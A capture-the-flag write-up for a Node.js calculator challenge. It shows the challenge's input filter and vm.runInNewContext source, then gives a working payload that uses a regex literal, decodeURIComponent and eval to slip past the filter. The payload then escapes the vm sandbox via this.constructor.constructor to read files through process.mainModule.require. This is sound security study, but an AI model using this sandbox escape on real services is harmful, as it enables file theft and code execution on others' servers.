Source code
```
#!/usr/local/bin/node

// flag in ./flag.txt

const vm = require("vm");
const readline = require("readline");

const interface = readline.createInterface({
input: process.stdin,
output: process.stdout,
});

interface.question(
"Welcome to CaaSio: Please Stop Edition! Enter your calculation:\n",
function (input) {
interface.close();
if (
input.length < 215 &&
/^[\x20-\x7e]+$/.test(input) &&
!/[.\[\]{}\s;`'"\\_<>?:]/.test(input) &&
!input.toLowerCase().includes("import")
) {
try {
const val = vm.runInNewContext(input, {});
console.log("Result:");
console.log(val);
console.log(
"See, isn't the calculator so much nicer when you're not trying to hack it?"
);
} catch (e) {
console.log("your tried");
}
} else {
console.log(
"Third time really is the charm! I've finally created an unhackable system!"
);
}
}
);
```
We have access to some handy functions: ```eval``` and ```decodeURIComponent```. Using ```decodeURIComponent``` let us avoid every sanitizing restrictions except one of them: we can not use quotes any type of it.
This is first key solution. We can use regexp literal to receiving text.

```1+/some text in regex/ === "1/some text in regex/"```

Now we can use attack template like this:

```attack = `eval(decodeURIComponent(1+/2,${payload}%2f/))` ```

Which produce functional equivalent of code

```eval('1/2,${payload}//1')```

But all banned symbols in payload must be replaced encoded values.

Step 2 is escaping from ```vm.runInNewContext```. Explanation of this technique can be find [here](https://thegoodhacker.com/posts/the-unsecure-node-vm-module/).

Solution
```
payload = `this.constructor.constructor('return process.mainModule.require("fs").readFileSync("./flag.txt","utf-8")')()`
payload = payload.replaceAll(".", '%2e')
.replaceAll("'", '%27')
.replaceAll('"', '%22')
.replaceAll('_', '%5f')
.replaceAll(' ', '%20')
.replaceAll('>', '%3e')
.replaceAll('[', '%5b')
.replaceAll(']', '%5d')
.replaceAll('/', '%2f')
attack = `eval(decodeURIComponent(1+/2,${payload}%2f/))`
console.log(attack)
```